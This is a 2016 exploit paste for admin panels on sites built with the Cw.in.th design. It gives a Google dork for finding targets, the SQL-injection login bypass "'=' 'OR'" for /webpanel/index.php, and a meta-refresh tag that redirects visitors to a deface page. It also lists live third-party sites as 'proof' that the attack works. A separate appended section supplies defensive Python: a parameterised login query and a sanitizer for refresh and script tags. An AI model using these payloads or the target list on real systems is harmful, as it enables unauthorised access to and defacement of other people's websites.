LelouchViBritannia

Design By Cw.in.th Admin Page Bypass Leading to XSS ATTACKS

Jun 1st, 2016
Design By Cw.in.th Admin Page Bypass Leading to XSS ATTACKS on Victim Website
###########################################
~Special Thanks Ashiyane Digital Security Team.! ^
~Exploit Title : Design By Cw.in.th Admin Page Bypass Leading to XSS ATTACKS on Victim Website
~Exploit Author: Lelouch Baklita
~Date : June 2 2016
~Tested on Live sites: See them on 3. Proof
# Vendor Homepage : http://cw.in.th/
# Google Dork : intext:"Design By Cw.in.th"
~Contact: lordzero2222@gmail.com
~facebook.com/MagdaloCyberArmy/
~facebook.com/www.globalsec.hacks.ph/
#########################################^
So I'll use their exploit as a reference for this exploit.
You can see it here -> https://cxsecurity.com/issue/WLB-2016060006
So now let's start.
######################
# Exploit Title : Design By Cw.in.th Admin Page Bypass
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://cw.in.th/
# Google Dork : intext:"Design By Cw.in.th"
# Date: 2016 05 31
# Tested On : Kali
# Contact: n3t.hacker@gmail.com
######################
# Describe : Search Dork And Select Target. Now Input webpanel/index.php After Url Such As:
#
# http://site.com/webpanel/index.php
#
# Enter Username and Password : '=' 'OR'
#
# Username : '=' 'OR'
# Password : '=' 'OR'
So let's get the job started.

0. I suppose you have some sites now, but I guarantee most of them were RAPED.

1.
After logging in, if you see any form boxes.... if you can't see any, then search :b There is a language problem; you can use Google Translate if you can't understand what it says.

2. Use the code below:
<meta http-equiv="refresh" content="1;URL=http://mammothcar.net/calebpogi.html"></span> <--- this will redirect to the desired URL.
3.
http://mammothcar.net/calebpogi.html: in this situation the HTML on mammothcar.net is my deface page, but on your own you will change it to your own deface page link. But you can try other methods as well.
4.
Proof :
http://premierlighting.co.th/webpanel/index.php <-- Log in there using '=' 'OR' then it will redirect :b
http://www.aurora-works.com/
http://www.tokyogemlab.co.th/newsevents.php
http://www.artiste-model.com/webpanel/ <-- Log in there using '=' 'OR' then it will redirect :b
http://www.hicoff.com/webpanel/ <-- Log in there using '=' 'OR' then it will redirect :b

Thanks for reading! Mabuhay!

Update: Still waiting for the vendor to respond :v
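From the defender's side, added here and not part of the original paste or of the vendor's code: the two fixes that close both steps of this writeup, a parameterised login lookup (the `'=' 'OR'` payload is bound as data, so the tautology never reaches the SQL parser) and a filter that strips `<meta http-equiv="refresh">` and `<script>` from HTML stored through the panel, recording any refresh target for alerting. The admin table, credentials, salt and URLs below are constructed; the real panel's schema is unknown.

```python
import hashlib, hmac, html, sqlite3
from html.parser import HTMLParser

SALT = b"constructed-demo-salt"  # real code: random per-user salt

def hash_pw(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the panel's admin table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT PRIMARY KEY, pw_hash BLOB)")
    conn.execute("INSERT INTO admin VALUES (?, ?)", ("admin", hash_pw("correct horse")))
    return conn

def authenticate(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameters: input such as '=' 'OR' travels as data, never as SQL,
    # so no tautology can widen the WHERE clause to match every row.
    row = conn.execute("SELECT pw_hash FROM admin WHERE username = ?", (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], hash_pw(password))

class RefreshStripper(HTMLParser):
    """Drops <meta http-equiv="refresh"> and <script> from stored panel HTML."""
    def __init__(self) -> None:
        super().__init__()
        self.out, self.flagged, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.flagged.append(a.get("content") or "")  # keep target for alerting
        elif tag == "script":
            self._in_script = True
        else:
            self.out.append(self.get_starttag_text())
    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <meta .../> gets no closing tag
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        else:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self._in_script:
            self.out.append(html.escape(data, quote=False))

def sanitize(fragment: str) -> tuple[str, list[str]]:
    """Returns (cleaned HTML, refresh targets that were removed)."""
    p = RefreshStripper()
    p.feed(fragment)
    p.close()
    return "".join(p.out), p.flagged
```

The stripper targets only the two tags this writeup abuses; a panel that stores arbitrary HTML should allowlist tags and attributes rather than denylist them.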